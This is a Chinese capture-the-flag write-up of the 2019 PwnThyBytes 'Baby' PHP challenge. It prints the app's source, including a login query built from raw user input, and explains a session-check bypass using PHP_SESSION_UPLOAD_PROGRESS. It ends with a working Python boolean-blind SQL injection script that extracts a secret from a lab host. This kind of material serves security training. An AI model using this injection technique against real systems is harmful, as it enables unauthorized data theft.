标签:username GET die value 2019 PwnThyBytes Baby POST con
没啥思路,看网页源代码,有个zip,下载/source.zip得到源码
index.php
<?php
session_start();
foreach ($_SESSION as $key => $value): $_SESSION[$key] = filter($value); endforeach;
foreach ($_GET as $key => $value): $_GET[$key] = filter($value); endforeach;
foreach ($_POST as $key => $value): $_POST[$key] = filter($value); endforeach;
foreach ($_REQUEST as $key => $value): $_REQUEST[$key] = filter($value); endforeach;
function filter($value)
{
!is_string($value) AND die("Hacking attempt!");
return addslashes($value);
}
isset($_GET['p']) AND $_GET['p'] === "register" AND $_SERVER['REQUEST_METHOD'] === 'POST' AND isset($_POST['username']) AND isset($_POST['password']) AND @include('templates/register.php');
isset($_GET['p']) AND $_GET['p'] === "login" AND $_SERVER['REQUEST_METHOD'] === 'GET' AND isset($_GET['username']) AND isset($_GET['password']) AND @include('templates/login.php');
isset($_GET['p']) AND $_GET['p'] === "home" AND @include('templates/home.php');
?>
register.php
<?php
!isset($_SESSION) AND die("Direct access on this script is not allowed!");
include 'db.php';
(preg_match('/(a|d|m|i|n)/', strtolower($_POST['username'])) OR strlen($_POST['username']) < 6 OR strlen($_POST['username']) > 10 OR !ctype_alnum($_POST['username'])) AND $con->close() AND die("Not allowed!");
$sql = 'INSERT INTO `ptbctf`.`ptbctf` (`username`, `password`) VALUES ("' . $_POST['username'] . '","' . md5($_POST['password']) . '")';
($con->query($sql) === TRUE AND $con->close() AND die("The user was created successfully!")) OR ($con->close() AND die("Error!"));
?>
login.php
<?php
!isset($_SESSION) AND die("Direct access on this script is not allowed!");
include 'db.php';
$sql = 'SELECT `username`,`password` FROM `ptbctf`.`ptbctf` where `username`="' . $_GET['username'] . '" and password="' . md5($_GET['password']) . '";';
$result = $con->query($sql);
function auth($user)
{
$_SESSION['username'] = $user;
return True;
}
($result->num_rows > 0 AND $row = $result->fetch_assoc() AND $con->close() AND auth($row['username']) AND die('<meta http-equiv="refresh" content="0; url=?p=home" />')) OR ($con->close() AND die('Try again!'));
?>
index.php有过滤搞不了,register.php过滤也超多
(preg_match('/(a|d|m|i|n)/', strtolower($_POST['username'])) OR strlen($_POST['username']) < 6 OR strlen($_POST['username']) > 10 OR !ctype_alnum($_POST['username'])) AND $con->close() AND die("Not allowed!");
这种写法第一次见,开始还以为写错了,挺有意思的,就是AND前面是true才执行后面的语句,OR前面是false才执行后面的语句。然后这里的意思前面有个大的括号里有一个满足就会执行$con->close(),然后这个执行返回true的话就会执行die(“Not allowed!”);
这里过滤也很严,长度也限制了,不行。
最后看到login.php
没有过滤,有个$_SESSION的判断,用PHP_SESSION_UPLOAD_PROGRESS绕过就好
https://www.freebuf.com/vuls/202819.html
然后下面这个代码就相当于判断我们sql语句执行返回结果,导致bool盲注
($result->num_rows > 0 AND $row = $result->fetch_assoc() AND $con->close() AND auth($row['username']) AND die('<meta http-equiv="refresh" content="0; url=?p=home" />')) OR ($con->close() AND die('Try again!'));
import requests
url="http://210ae153-9ac8-4e4c-b100-daee168464ab.node4.buuoj.cn:81/templates/login.php"
files={'1.txt':'111111'}
datas={'PHP_SESSION_UPLOAD_PROGRESS':'2333'}
cookies={'PHPSESSID':'test1'}
flag=""
for i in range(1,100):
low=32
high=128
mid=(low+high)//2
while low<high:
payload='" or (ascii(substr((select group_concat(secret) from flag_tbl ),{},1))>{})#'.format(i,mid)
params={'password':'test1','username':payload}
r=requests.post(url,params=params,data=datas,files=files,cookies=cookies)
if "Try again!" not in r.text:
low=mid+1
else:
high=mid
mid=(low+high)//2
print(low,mid,high)
flag+=chr(mid)
print(flag)
if mid==32:
break
标签:username,GET,die,value,2019,PwnThyBytes,Baby,POST,con 来源: https://blog.csdn.net/jvkyvly/article/details/120297228
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。